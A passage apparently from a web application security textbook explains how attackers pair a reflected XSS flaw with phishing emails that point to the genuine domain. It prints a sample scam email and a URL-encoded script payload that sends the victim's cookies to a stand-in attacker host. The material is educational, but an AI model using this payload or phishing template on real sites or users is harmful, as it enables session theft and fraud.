assumed to contain code, rather than data, and so cross-domain access

see, this assumption breaks down in certain situations, leading to

cross-domain attacks.

■■

A page residing on one domain cannot read or modify the cookies or

other DOM data belonging to another domain (as described in the

previous example).

The second reason why the attacker goes to the trouble of exploiting the XSS

vulnerability is that step 2 of the process just described is far likelier to succeed

if the URL crafted by the attacker starts with 

wahh-app.com

rather than 

wahh-

attacker.com

. Suppose that the attacker attempts to snare his victims by send-

ing out millions of emails like the following:

From: “WahhApp Customer Services”

To: “John Smith” 

Subject: Complete our customer survey and receive a $5 credit

Dear Valued Customer, 

You have been selected to participate in our customer survey. Please

complete our easy 5 question survey, and in return we will credit $5 to

your account.

To access the survey, please log in to your account using your usual

bookmark, and then click on the following link: 

https://wahh-app.com/%65%72%72%6f%72%2e%70%68%70?message%3d%3c%73%63

%72ipt>var+i=ne%77+Im%61ge%3b+i.s%72c=”ht%74%70%3a%2f%2f%77ahh-att

%61%63%6ber.co%6d%2f”%2bdocum%65%6e%74%2e%63ookie;

Many thanks and kind regards,

Wahh-App Customer Services

Even to someone who is aware of the threats posed by phishing-style scams,

this email is actually fairly reassuring:

■■

They are told to access their account using their usual bookmark.

■■

The link they are invited to click on points to the correct domain name

used by the application.

■■

The URL has been obfuscated from the version in step 2, by URL-

encoding selected characters so that its malicious intent is not immedi-

ately obvious.

■■

The HTTPS security check will succeed, because the URL provided by

the attacker is actually delivered by the authentic 

wahh-app.com

server.

Download 5,76 Mb.

Do'stlaringiz bilan baham: